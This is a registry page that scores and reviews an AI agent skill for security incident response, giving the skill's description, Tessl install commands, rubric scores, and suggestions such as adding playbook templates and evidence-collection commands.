responding-to-security-incidents
Assists with security incident response, investigation, and remediation. This skill is triggered when the user requests help with incident response, mentions specific incident types (e.g., data breach, ransomware, DDoS), or uses terms like "incident response plan", "containment", "eradication", or "post-incident activity". It guides the user through the incident response lifecycle, from preparation to post-incident analysis. It is useful for classifying incidents, creating response playbooks, collecting evidence, constructing timelines, and generating remediation steps. Use this skill when needing to respond to a "security incident".
Install with Tessl CLI
npx tessl i github:jeremylongshore/claude-code-plugins-plus-skills --skill responding-to-security-incidents92
Quality
60%
Does it follow best practices?
Impact
98%
1.01xAverage score across 9 eval scenarios
Optimize this skill with Tessl
npx tessl skill review --optimize ./backups/skills-migration-20251108-070147/plugins/security/security-incident-responder/skills/security-incident-responder/SKILL.mdDiscovery
100%Based on the skill's description, can an agent find and select it at the right time? Clear, specific descriptions lead to better discovery.
This is a well-crafted skill description that excels across all dimensions. It provides specific concrete actions, comprehensive trigger terms that users would naturally use, explicit 'when to use' guidance, and a clear security incident response niche that distinguishes it from other skills. The description uses proper third-person voice throughout.
| Dimension | Reasoning | Score |
|---|---|---|
Specificity | Lists multiple specific concrete actions: 'classifying incidents, creating response playbooks, collecting evidence, constructing timelines, and generating remediation steps.' Also mentions guiding through the incident response lifecycle. | 3 / 3 |
Completeness | Clearly answers both what (assists with incident response, investigation, remediation, classifying incidents, creating playbooks, etc.) AND when (explicit trigger guidance with 'This skill is triggered when...' and 'Use this skill when...' clauses with specific trigger terms). | 3 / 3 |
Trigger Term Quality | Excellent coverage of natural terms users would say: 'incident response', 'data breach', 'ransomware', 'DDoS', 'incident response plan', 'containment', 'eradication', 'post-incident activity', 'security incident'. These are terms users would naturally use when needing this skill. | 3 / 3 |
Distinctiveness Conflict Risk | Clear niche focused specifically on security incident response with distinct triggers like 'data breach', 'ransomware', 'DDoS', 'containment', 'eradication'. Unlikely to conflict with general security or documentation skills due to specific incident-focused terminology. | 3 / 3 |
Total | 12 / 12 Passed |
Implementation
20%Reviews the quality of instructions and guidance provided to agents. Good implementation is clear, handles edge cases, and produces reliable results.
This skill content reads as a high-level description or marketing overview rather than actionable guidance for incident response. It explains concepts Claude already understands, lacks concrete artifacts (playbook templates, evidence collection commands, checklists), and provides no executable examples. The content would benefit from being rewritten as actual reference material with specific, copy-paste ready resources.
Suggestions
Replace abstract descriptions with concrete playbook templates (e.g., a ransomware response checklist with specific commands like 'netstat -an | grep ESTABLISHED' for network analysis)
Add executable evidence collection commands for common scenarios (log locations, forensic tools, preservation commands)
Remove the 'How It Works' and 'When to Use This Skill' sections entirely - these explain what Claude should already infer from context
Include specific incident classification criteria (severity matrix, scope definitions) as actionable reference tables rather than prose descriptions
| Dimension | Reasoning | Score |
|---|---|---|
Conciseness | Extremely verbose with unnecessary explanations of what the skill does, how it works, and when to use it. Claude already knows incident response concepts; this reads like marketing copy rather than actionable instructions. | 1 / 3 |
Actionability | No concrete commands, code, or executable guidance. Examples describe what 'the skill will' do abstractly rather than providing actual playbook templates, specific commands for evidence collection, or copy-paste ready checklists. | 1 / 3 |
Workflow Clarity | Lists high-level steps (containment, eradication, recovery) but lacks specific validation checkpoints, concrete decision points, or feedback loops for error recovery during incident response. | 2 / 3 |
Progressive Disclosure | Content is organized into sections but everything is inline with no references to detailed playbooks, checklists, or external resources. The 'Integration' section hints at capabilities without providing actionable links or details. | 2 / 3 |
Total | 6 / 12 Passed |
Validation
100%Checks the skill against the spec for correct structure and formatting. All validation checks must pass before discovery and implementation can be scored.
Validation — 11 / 11 Passed
Validation for skill structure
No warnings or errors.
- Reviewed
Table of Contents
Is this your skill?
If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.